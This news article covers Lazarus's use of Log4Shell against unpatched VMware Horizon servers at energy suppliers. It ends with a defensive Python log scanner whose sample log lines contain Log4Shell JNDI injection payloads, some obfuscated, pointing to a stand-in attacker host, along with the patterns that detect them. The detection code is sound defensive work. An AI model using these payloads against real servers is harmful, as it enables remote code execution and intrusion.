Information security company Cisco Talos recently revealed that the Log4Shell vulnerability (CVE-2021-44228) in the Java logging framework Apache Log4j continues to serve as an entry point for hacking groups. From February to July this year, the North Korean hacker group Lazarus targeted energy suppliers in the U.S., Canada and Japan that were running VMware Horizon deployments not yet patched against the vulnerability, launching attacks to plant further malicious programs on those organizations' systems.
Log4Shell, disclosed in November 2021, is an arbitrary code execution vulnerability with a CVSS score of 10. About 20 Apache projects are affected by Log4Shell, and countless commercial services are affected through their use of Log4j or related projects; Ernst & Young estimated that 93% of cloud environments are at risk. VMware's virtual desktop and application management platform, VMware Horizon, is one of the many products affected.
Cisco Talos pointed out that Lazarus used the Log4Shell vulnerability in VMware products as its initial access to corporate networks, then deployed malware developed by the group to persist on victim networks, in order to steal confidential information and intellectual property from these organizations for espionage or in support of the North Korean government's goals. Because VMware Horizon runs with administrative privileges, the attackers did not need to worry about privilege escalation at all, and after entering the victim network they disabled the system's anti-virus components.
Image credit/Cisco Talos
In this wave of attacks targeting energy suppliers in Canada, the United States and Japan, the Lazarus Group used three pieces of custom malware: two already known, VSingle and YamaBot, and the newly discovered MagicRAT.
VSingle was disclosed as early as March last year. It is an HTTP bot that communicates with a remote C&C server to execute arbitrary programs remotely or to download and execute plug-ins. YamaBot is a malicious program written in Golang that originally targeted the Linux platform, though versions supporting Windows also exist; both allow the attackers to execute commands remotely. The newly discovered MagicRAT uses a C&C server different from those of VSingle and YamaBot, and its function is likewise to maintain the attackers' access to the system.
Another information security expert suggested that when patching software affected by Log4Shell, it is best to first make sure the existing vulnerability has not already been exploited by attackers, and only then update the software; otherwise an organization may have been penetrated without knowing it.
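As an added example, not taken from the Cisco Talos report or from this article, the following Python script illustrates the kind of pre-patch check the expert describes: reviewing the access logs of a web-facing Java application (such as a VMware Horizon front end) for Log4j lookup strings before concluding that a system was never probed. The sample log lines and the IP addresses in them are constructed for this example; the normalisation step collapses the common lookup-wrapper forms (`${lower:..}`, `${upper:..}`, `${::-..}`) so that a `jndi` string split across them is still recognised, and any remaining `${...:...}` lookup syntax is reported at a lower severity for analyst review.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (Apache combined format); the user-agent
# field is the usual place an attacker-controlled string lands in Log4j output.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [01/Mar/2022:10:15:32 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Mar/2022:10:16:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [01/Mar/2022:10:16:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [01/Mar/2022:10:16:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/b}"',
    '10.0.0.12 - - [01/Mar/2022:10:17:00 +0000] "GET /portal/?q=${env:HOME} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

# Lookup wrappers that resolve to their inner text: ${lower:x}, ${upper:x}, ${::-x}.
# Group 1 captures the lower/upper form, group 2 the "default value" form.
_WRAPPER = re.compile(
    r"\$\{(?:lower|upper):([^{}]*)\}"   # ${lower:j} -> j
    r"|\$\{[^{}]*?:-([^{}]*)\}",        # ${::-j}    -> j
    re.IGNORECASE,
)
# The indicator we actually care about once wrappers are collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any remaining Log4j lookup syntax (env:, sys:, date:, ...) is worth a look too.
_ANY_LOOKUP = re.compile(r"\$\{[^{}]*:[^{}]*\}")


def normalize(text: str) -> str:
    """Repeatedly collapse lookup wrappers until the string stops changing.

    Wrappers can be nested, so one pass is not enough; the loop terminates
    because every substitution strictly shortens the string."""
    previous = None
    while previous != text:
        previous = text
        text = _WRAPPER.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text


def scan_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per suspicious line: line number, severity, reason,
    and the normalised text so the analyst sees the de-obfuscated indicator."""
    findings: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        if _JNDI.search(normalized):
            findings.append({"line": number, "severity": "high",
                             "reason": "JNDI lookup string", "normalized": normalized})
        elif _ANY_LOOKUP.search(normalized):
            findings.append({"line": number, "severity": "medium",
                             "reason": "other Log4j lookup syntax", "normalized": normalized})
    return findings


def scan_file(path: str) -> List[Dict[str, object]]:
    """Convenience wrapper for a real log file (read with errors ignored,
    since attacker input is frequently not valid UTF-8)."""
    with open(path, "r", encoding="utf-8", errors="replace") as handle:
        return scan_lines(handle.read().splitlines())


if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line']:>4}  {finding['severity']:<6}  {finding['reason']}")
        print(f"            {finding['normalized']}")
```

Run it against the embedded sample to see three high-severity hits (the plain, the `lower:`-wrapped and the `::-`-wrapped JNDI strings all reduce to the same `${jndi:...}` form) and one medium hit for the `${env:HOME}` probe. A hit does not by itself prove successful exploitation, but it does mean the host was targeted before the patch and deserves the host-level review (new services, scheduled tasks, disabled anti-virus) the article describes, rather than a patch-and-forget.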